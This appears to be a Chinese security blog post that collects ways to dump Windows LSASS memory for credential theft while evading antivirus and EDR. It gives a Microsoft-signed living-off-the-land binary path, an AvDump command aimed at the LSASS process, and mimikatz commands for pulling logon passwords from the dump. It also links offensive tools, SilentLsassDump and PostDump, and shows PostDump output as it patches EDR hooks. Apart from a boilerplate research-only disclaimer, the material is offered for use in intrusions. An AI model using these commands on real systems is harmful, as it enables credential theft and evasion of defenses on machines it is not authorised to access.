Dump LSASS SKill

admin 2022年7月1日02:52:16安全文章Dump LSASS SKill已关闭评论11 views1137字阅读3分47秒阅读模式

文章前言

获取Windows用户的凭证信息是渗透过程中至关重要的一步,如果没有杀软,那么只要有权限想怎么读就怎么读,当有杀软时就得用一些特别的技巧,本篇文章将简单介绍几种之前在Twitter上看到的小技巧,仅供大家参考


LOLBIN

文件路径(需要下载最新版本的VS2022):

C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions

证书说明:微软签名

图片

转储实践:

图片

之后使用mimikatz查看dump.txt:

sekurlsa::minidump "c:\users\mr.d0x\downloads\dump.txt"sekurlsa::logonpasswords


图片


AvDump

文件下载(安全性自查):

https://github.com/f1tz/Misc/blob/9c41db77e41d42146467516ca865313f810c44f3/AvDump/x86/AvDump.exe

转储命令:

.\AvDump.exe --pid 704 --exception_ptr 0 --thread_id 0 --dump_level 1 --dump_file lsass.dmp

图片

SilentLsassDump


项目地址:

https://github.com/guervild/BOFs/tree/dev/SilentLsassDump

图片

silentLsassDump <LSASS PID>

图片

PostDump

项目地址:

https://github.com/post-cyberlabs/Offensive_tools/tree/main/PostDump

图片

项目介绍:PostDump是由COS团队(网络攻击和安全)开发的C#工具,它使用几种技术绕过EDR Hook和lsass保护来执行内存转储(lsass)

项目使用:

C:\Temp>PostDump.exe
[*] NtReadVirtualMemory: HOOKED! Patching...[*] NtReadVirtualMemory --> NOT Hooked!
[*] NtOpenProcess: NOT Hooked![*] Real Process Handle: 728
[*] PssCaptureSnapshot: NOT Hooked![*] Snapshot succeed! Duplicate handle: 1549097566208
[*] MiniDumpWriteDump: NOT Hooked![*] Duplicate dump successful. Dumped 49737034 bytes to: c:\Temp\yolo.log

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月1日02:52:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  Dump LSASS SKill http://cn-sec.com/archives/1149465.html